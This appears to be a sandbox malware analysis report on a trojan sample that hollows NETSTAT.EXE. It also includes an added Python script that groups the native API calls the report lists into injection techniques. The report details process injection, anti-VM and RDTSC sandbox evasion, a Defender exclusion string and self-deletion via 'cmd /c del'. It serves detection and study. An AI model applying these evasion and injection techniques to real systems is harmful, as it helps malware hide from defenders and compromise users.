Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9540 NtReadFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C95D0 NtClose,LdrInitializeThunk
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9840 NtDelayExecution,LdrInitializeThunk
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C98F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C97A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9A00 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9A20 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C96E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011CAD30 NtSetContextThread
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9950 NtQueueApcThread
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9560 NtWriteFile
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C99D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C95F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9820 NtEnumerateKey
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011CB040 NtSuspendThread
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C98A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011CA710 NtOpenProcessToken
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9B00 NtSetValueKey
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9730 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9770 NtSetInformationFile
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011CA770 NtOpenThread
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9760 NtOpenProcess
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011CA3B0 NtGetContextThread
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9610 NtEnumerateValueKey
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9A10 NtQuerySection
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9650 NtQueryValueKey
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9670 NtQueryInformationProcess
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C9A80 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011C96D0 NtCreateKey
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D896D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D896E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89650 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D895D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D899A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89A10 NtQuerySection
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89A20 NtResumeThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D8A3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D897A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89770 NtSetInformationFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D8A770 NtOpenThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89760 NtOpenProcess
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D8A710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89B00 NtSetValueKey
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D898F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D898A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D8B040 NtSuspendThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89820 NtEnumerateKey
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D899D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D895F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89950 NtQueueApcThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89560 NtWriteFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D8AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D89520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003D85B0 NtCreateFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003D8660 NtReadFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003D86E0 NtClose
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003D8790 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003D85AA NtCreateFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003D86DA NtClose
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003D878A NtAllocateVirtualMemory
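The native-API stubs listed above are what the report's "process hollowing", "maps a DLL or memory area into another process", "queues an APC" and "modifies the context of a thread" signatures rest on: the payload resolves ntdll's Nt* entry points itself rather than importing them. The following is an added example, not Joe Sandbox code, that parses these "Code function" lines and checks which injection primitive sets a process has fully resolved. The sample text is a subset of lines copied from this report (with the duplicated trailing function id, as the raw page has it); the primitive sets are this example's own grouping, not a documented taxonomy.

```python
"""Group resolved Nt* stubs from Joe Sandbox "Code function" lines into injection primitives.

Added example for this report (not sandbox code). It parses lines of the form
  ... Code function: <pid>_<phase>_<addr> NtFoo,LdrInitializeThunk,<pid>_<phase>_<addr>
and reports, per process, which well-known primitive sets are complete.
"""
import re
from collections import defaultdict

# Subset of lines copied from this report (raw form, trailing id duplicated).
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C99A0 NtCreateSection,LdrInitializeThunk,6_2_011C99A0
Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9780 NtMapViewOfSection,LdrInitializeThunk,6_2_011C9780
Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C97A0 NtUnmapViewOfSection,LdrInitializeThunk,6_2_011C97A0
Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C98A0 NtWriteVirtualMemory,6_2_011C98A0
Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011CAD30 NtSetContextThread,6_2_011CAD30
Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9A20 NtResumeThread,LdrInitializeThunk,6_2_011C9A20
Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9950 NtQueueApcThread,6_2_011C9950
Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011CA770 NtOpenThread,6_2_011CA770
Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011CB040 NtSuspendThread,6_2_011CB040
Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011CA3B0 NtGetContextThread,6_2_011CA3B0
Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C99D0 NtCreateProcessEx,6_2_011C99D0
Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89560 NtWriteFile,18_2_02D89560
Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D895D0 NtClose,LdrInitializeThunk,18_2_02D895D0
Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_00401030
""".strip("\n")

# Trailing "<pid>_<phase>_<addr>" is optional so cleaned-up lines parse too.
_FUNC_RE = re.compile(
    r"Code function: (?P<pid>\d+)_(?P<phase>\d+)_(?P<addr>[0-9A-Fa-f]{8}) "
    r"(?P<calls>[A-Za-z0-9_,]+?),?(?:(?P=pid)_(?P=phase)_(?P=addr))?\s*$"
)

# This example's own grouping of primitives (not a documented taxonomy).
TECHNIQUE_SETS = {
    "process hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
    "section mapping":   {"NtCreateSection", "NtMapViewOfSection"},
    "APC queueing":      {"NtOpenThread", "NtQueueApcThread"},
    "thread hijack":     {"NtSuspendThread", "NtGetContextThread",
                          "NtSetContextThread", "NtResumeThread"},
}


def parse_report(text: str) -> list:
    """Return (pid, address, [call names]) for each line that names resolved calls."""
    entries = []
    for line in text.splitlines():
        m = _FUNC_RE.search(line)
        if not m:
            continue   # bare "Code function: 6_2_00401030" lines carry no call names
        calls = [c for c in m.group("calls").split(",") if c]
        entries.append((int(m.group("pid")), int(m.group("addr"), 16), calls))
    return entries


def nt_calls_by_pid(entries: list) -> dict:
    """Collect the Nt* names per process, dropping loader thunks like LdrInitializeThunk."""
    by_pid = defaultdict(set)
    for pid, _addr, calls in entries:
        by_pid[pid].update(c for c in calls if c.startswith("Nt"))
    return by_pid


def classify(nt_calls: set) -> dict:
    """Map each technique to (complete, missing calls) for one process's resolved set."""
    return {name: (required <= nt_calls, sorted(required - nt_calls))
            for name, required in TECHNIQUE_SETS.items()}


if __name__ == "__main__":
    for pid, calls in sorted(nt_calls_by_pid(parse_report(REPORT_LINES)).items()):
        for technique, (complete, missing) in classify(calls).items():
            status = "complete" if complete else f"missing {missing}"
            print(f"pid {pid}: {technique}: {status}")
```

On the full list the hollowed Fu94e0b1TR.exe (pid 6) and the NETSTAT.EXE host (pid 18) resolve the same set, which is expected when the same payload has been injected into both; the presence of NtCreateProcessEx alongside the hollowing set is what lets it create its own suspended target rather than only attaching to a running one.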
Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameObjectMarshal.exe6 vs Fu94e0b1TR.exe
Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename vs Fu94e0b1TR.exe
Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp | Binary or memory string: m,\\StringFileInfo\\000004B0\\OriginalFilename vs Fu94e0b1TR.exe
Source: Fu94e0b1TR.exe, 00000000.00000002.287588690.00000000070D0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameUI.dll< vs Fu94e0b1TR.exe
Source: Fu94e0b1TR.exe, 00000005.00000002.272314311.00000000003AE000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameObjectMarshal.exe6 vs Fu94e0b1TR.exe
Source: Fu94e0b1TR.exe, 00000006.00000000.272808507.000000000066E000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameObjectMarshal.exe6 vs Fu94e0b1TR.exe
Source: Fu94e0b1TR.exe, 00000006.00000002.371649875.000000000127F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Fu94e0b1TR.exe
Source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenamenetstat.exej% vs Fu94e0b1TR.exe
Source: Fu94e0b1TR.exe | Binary or memory string: OriginalFilenameObjectMarshal.exe6 vs Fu94e0b1TR.exe
Source: Fu94e0b1TR.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Fu94e0b1TR.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Fu94e0b1TR.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\Fu94e0b1TR.exe 'C:\Users\user\Desktop\Fu94e0b1TR.exe'
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Process created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exe
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Process created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exeJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe'Jump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeFile created: C:\Users\user\AppData\Local\GottschalksJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@6/2
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_01
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Fu94e0b1TR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Fu94e0b1TR.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: netstat.pdbGCTL source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmp
            Source: Binary string: netstat.pdb source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Fu94e0b1TR.exe, 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, NETSTAT.EXE, 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: Fu94e0b1TR.exe, NETSTAT.EXE

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: Fu94e0b1TR.exe, MapEditor1/CreateMapDialog.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.0.Fu94e0b1TR.exe.6d0000.0.unpack, MapEditor1/CreateMapDialog.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.2.Fu94e0b1TR.exe.6d0000.0.unpack, MapEditor1/CreateMapDialog.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 5.0.Fu94e0b1TR.exe.350000.0.unpack, MapEditor1/CreateMapDialog.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 5.2.Fu94e0b1TR.exe.350000.0.unpack, MapEditor1/CreateMapDialog.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 6.2.Fu94e0b1TR.exe.610000.1.unpack, MapEditor1/CreateMapDialog.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 6.0.Fu94e0b1TR.exe.610000.0.unpack, MapEditor1/CreateMapDialog.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 0_2_00F5203B push ebx; retf 0_2_00F5207A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 0_2_07131CAA push 8406FDCBh; retf 0_2_07131CB1
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 0_2_07133B05 push FFFFFF8Bh; iretd 0_2_07133B07
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0041B85C push eax; ret 6_2_0041B862
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_00407027 push ebx; ret 6_2_00407096
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_00415115 push es; iretd 6_2_00415128
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_00414F3A push ds; iretd 6_2_00414F3B
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0041B7F2 push eax; ret 6_2_0041B7F8
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0041B7FB push eax; ret 6_2_0041B862
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_0041B7A5 push eax; ret 6_2_0041B7F8
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_011DD0D1 push ecx; ret 6_2_011DD0E4
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_02D9D0D1 push ecx; ret 18_2_02D9D0E4
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003C7027 push ebx; ret 18_2_003C7096
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003DB85C push eax; ret 18_2_003DB862
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003D5115 push es; iretd 18_2_003D5128
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003D4F3A push ds; iretd 18_2_003D4F3B
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003DB7A5 push eax; ret 18_2_003DB7F8
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003DB7FB push eax; ret 18_2_003DB862
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 18_2_003DB7F2 push eax; ret 18_2_003DB7F8
            Source: initial sample | Static PE information: section name: .text entropy: 7.77320879492

            Hooking and other Techniques for Hiding and Protection:

            Self deletion via cmd delete
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: /c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe'
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM3
            Source: Yara match | File source: 0.2.Fu94e0b1TR.exe.2b61628.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Fu94e0b1TR.exe PID: 4628, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 00000000003C8604 second address: 00000000003C860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 00000000003C898E second address: 00000000003C8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe TID: 4632 | Thread sleep time: -35139s >= -30000s
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe TID: 6040 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Last function: Thread delayed
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_004088C0 rdtsc 6_2_004088C0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Thread delayed: delay time: 35139
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Thread delayed: delay time: 922337203685477
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000007.00000000.308243918.000000000891C000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
            Source: explorer.exe, 00000007.00000000.294128069.000000000DC20000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Ap88
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000007.00000000.308243918.000000000891C000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp | Binary or memory string: vmware
            Source: explorer.exe, 00000007.00000000.299944517.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
            Source: explorer.exe, 00000007.00000000.308321174.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
            Source: explorer.exe, 00000007.00000000.357810922.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
            Source: explorer.exe, 00000007.00000000.308321174.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_004088C0 rdtsc 6_2_004088C0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Code function: 6_2_01258D34 mov eax, dword ptr fs:[00000030h] 6_2_01258D34
